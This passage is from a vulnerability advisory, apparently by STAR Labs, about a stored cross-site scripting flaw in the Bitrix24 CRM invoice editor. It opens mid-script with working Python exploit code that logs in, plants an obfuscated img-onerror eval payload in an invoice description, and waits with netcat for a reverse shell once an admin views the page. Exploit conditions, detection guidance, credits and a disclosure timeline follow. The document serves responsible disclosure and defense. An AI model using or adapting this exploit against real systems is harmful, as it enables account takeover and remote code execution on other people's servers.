            HOST + f"/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=%2Fcrm%2Finvoice%2Fedit%2F{TARGET_INVOICE_ID}%2F",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
            },
            data={
                "sessid": sessid,
                "CRM_INVOICE_EDIT_V12_active_tab": "tab_1",
                "ACCOUNT_NUMBER": TARGET_INVOICE_ID,
                "ORDER_TOPIC": "sss",
                "STATUS_ID": "N",
                "PAY_VOUCHER_DATE": "",
                "PAY_VOUCHER_NUM": "",
                "REASON_MARKED_SUCCESS": "",
                "DATE_MARKED": "",
                "REASON_MARKED": "",
                "PRIMARY_ENTITY_TYPE": "COMPANY",
                "PRIMARY_ENTITY_ID": "1",
                "SECONDARY_ENTITY_IDS": "7",
                "REQUISITE_ID": "0",
                "BANK_DETAIL_ID": "0",
                "PAY_SYSTEM_ID": "1",
                "UF_MYCOMPANY_ID": "0",
                "MC_REQUISITE_ID": "0",
                "MC_BANK_DETAIL_ID": "0",
                "RECUR_PARAM[PERIOD]": "1",
                "RECUR_PARAM[DAILY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[DAILY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[WEEKLY_INTERVAL_WEEK]": "1",
                "RECUR_PARAM[WEEKLY_WEEK_DAYS][]": "1",
                "RECUR_PARAM[MONTHLY_TYPE]": "1",
                "RECUR_PARAM[MONTHLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[MONTHLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[MONTHLY_WEEKDAY_NUM]": "0",
                "RECUR_PARAM[MONTHLY_WEEK_DAY]": "1",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[YEARLY_TYPE]": "1",
                "RECUR_PARAM[YEARLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[YEARLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[YEARLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[YEARLY_WEEK_DAY_NUM]": "0",
                "RECUR_PARAM[YEARLY_WEEK_DAY]": "1",
                "RECUR_PARAM[YEARLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[START_DATE]": "",
                "RECUR_PARAM[REPEAT_TILL]": "",
                "RECUR_PARAM[END_DATE]": "",
                "RECUR_PARAM[LIMIT_REPEAT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_TYPE]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_COUNT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_PERIOD]": "1",
                "RECUR_PARAM[RECURRING_EMAIL_ID]": "22",
                "COMMENTS": "",
                "USER_DESCRIPTION": b"<img src=x onerror\xe2\x80\xa9=eval(atob('"+payload+b"'))>",
                "INVOICE_PRODUCT_DATA": "[{\"ID\":0,\"PRODUCT_NAME\":\"Bitrix Site Manager\",\"PRODUCT_ID\":23,\"QUANTITY\":\"1.0000\",\"MEASURE_CODE\":796,\"MEASURE_NAME\":\"pcs.\",\"PRICE\":\"0.00\",\"PRICE_EXCLUSIVE\":\"0.00\",\"PRICE_NETTO\":\"0.00\",\"PRICE_BRUTTO\":\"0.00\",\"DISCOUNT_TYPE_ID\":1,\"DISCOUNT_RATE\":\"0.00\",\"DISCOUNT_SUM\":\"0.00\",\"TAX_RATE\":\"0.00\",\"TAX_INCLUDED\":\"N\",\"CUSTOMIZED\":\"Y\",\"SORT\":10}]",
                "INVOICE_PRODUCT_DATA_SETTINGS": "{\"ENABLE_DISCOUNT\": \"N\",\"ENABLE_TAX\": \"N\"}",
                "saveAndView": "Save",
                "invoice_id": TARGET_INVOICE_ID
            }
        )
        print(f"[+] Edited invoice {TARGET_INVOICE_ID}")
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = login(s, USERNAME, PASSWORD)
        edit_invoice(s, sessid)
        print(f"[+] Visit this URL as admin to execute attack: {HOST}/crm/invoice/edit/{TARGET_INVOICE_ID}/")
        print("[+] Waiting for reverse shell connection")
        subprocess.run(["nc", "-nvlp", str(LPORT)])
    

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has access to the CRM feature and permission to create and export contacts. This level of access may be granted if the user is in the management board group.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of the byte string \xe2\x80\xa9 in request bodies. The presence of this string together with other characters like < and = indicate possible exploitation of this vulnerability.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

Tag

#java